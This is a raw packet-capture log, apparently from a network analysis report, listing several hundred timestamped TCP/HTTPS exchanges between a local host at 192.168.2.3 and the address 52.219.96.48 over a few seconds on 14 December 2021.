                                                                                              Dec 14, 2021 00:57:12.882091045 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882107973 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882417917 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882473946 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882498980 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882514000 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882530928 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882566929 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882576942 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882833004 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882877111 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882919073 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882934093 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.882951021 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882987022 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.882994890 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883285999 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883286953 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.883312941 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883371115 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883378029 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.883404970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883420944 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.883429050 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:12.883440971 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.883490086 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:12.883496046 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.031949997 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032001019 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032155991 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032239914 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032255888 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032283068 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032320976 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032331944 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032387972 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032407999 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032433987 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032464981 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032576084 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032668114 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032706976 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032773972 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032789946 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032866955 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.032881021 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.032980919 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.033122063 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.033159018 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.033231020 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.033241034 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.033260107 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.033314943 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.033385992 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.033523083 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.033633947 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.034475088 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034622908 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.034636021 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034687042 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034723043 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034743071 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.034755945 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034856081 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.034868002 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034892082 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034930944 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.034949064 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.034961939 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035041094 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035053968 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035090923 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035121918 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035125971 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035147905 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035202026 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035283089 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035288095 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035304070 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035355091 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035382986 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035398960 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.035445929 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.035496950 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.183674097 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.183726072 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.183917046 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184026957 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184039116 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184066057 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184115887 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184123039 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184149981 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184165001 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184267044 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184336901 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184422016 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184458017 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184539080 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184540987 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184559107 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184597015 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184648991 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184840918 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184911013 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.184966087 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.184984922 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185017109 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185067892 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185080051 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185178041 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185401917 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185439110 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185511112 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185513020 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185530901 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185595989 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185832977 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185869932 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185940981 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.185952902 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.185997009 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186045885 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186054945 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186119080 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186228991 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186264992 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186337948 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186343908 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186362982 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186419010 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186489105 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186630011 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186670065 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186739922 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186742067 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186760902 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.186808109 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.186851025 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.187140942 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.187177896 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.187241077 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.187288046 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.187305927 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.187381029 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.487721920 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.487746954 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.487844944 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.487927914 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.487961054 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.487984896 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.487996101 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488043070 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488059998 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488074064 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488100052 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488112926 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488147974 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488162041 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488174915 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488214970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488215923 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488241911 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488250971 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488265038 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488295078 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488303900 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488318920 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488338947 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488375902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488378048 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488399029 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488401890 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488440990 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488451004 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488497019 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488550901 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488570929 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488606930 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488645077 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488657951 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488673925 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488708019 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488718987 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488769054 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488780022 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488799095 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488840103 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488862991 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488883972 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488898039 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.488915920 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488990068 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.488995075 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489017963 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489056110 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489082098 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489098072 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489109039 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489129066 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489161968 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489170074 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489191055 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489221096 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489227057 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489245892 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489272118 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489301920 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489343882 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489392042 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489418030 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489454031 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489491940 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489505053 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489521027 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489567995 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.489578009 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.489631891 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638079882 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638138056 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638468027 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638510942 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638535023 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638545036 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638648033 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638662100 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638750076 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638767004 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638786077 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638828039 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638839006 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638937950 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.638952017 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638979912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.638998032 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639019966 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639089108 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639101028 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639178038 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639178991 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639204025 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639230013 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639265060 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639333963 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639341116 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639354944 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639416933 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639425039 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639439106 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639491081 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639514923 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639528990 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639583111 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639602900 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639631033 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639645100 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639710903 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639789104 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.639800072 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.639873028 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.787988901 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788048029 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788139105 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788300037 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788357019 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.788395882 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788423061 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.788497925 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.788512945 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788602114 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.788794041 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788832903 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788904905 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.788918972 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.788996935 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789010048 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789087057 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789282084 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789321899 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789386034 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789398909 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789473057 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789486885 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789566040 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789715052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789753914 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789820910 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789832115 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.789906025 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789951086 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.789963007 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.790030956 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.790139914 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.790256023 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.791043997 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.791168928 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.791182041 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.791258097 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.829235077 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.829289913 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.829346895 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.829468012 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.829485893 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.829550028 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.829591990 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.939069986 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939121962 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939321995 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939464092 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939547062 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.939583063 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939616919 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.939712048 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.939846992 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939886093 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939966917 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.939971924 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.939994097 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.940045118 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940119982 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940277100 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.940316916 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.940395117 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940416098 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.940438986 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940506935 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940520048 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:13.940622091 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:13.940700054 CET4434975252.219.96.48192.168.2.3
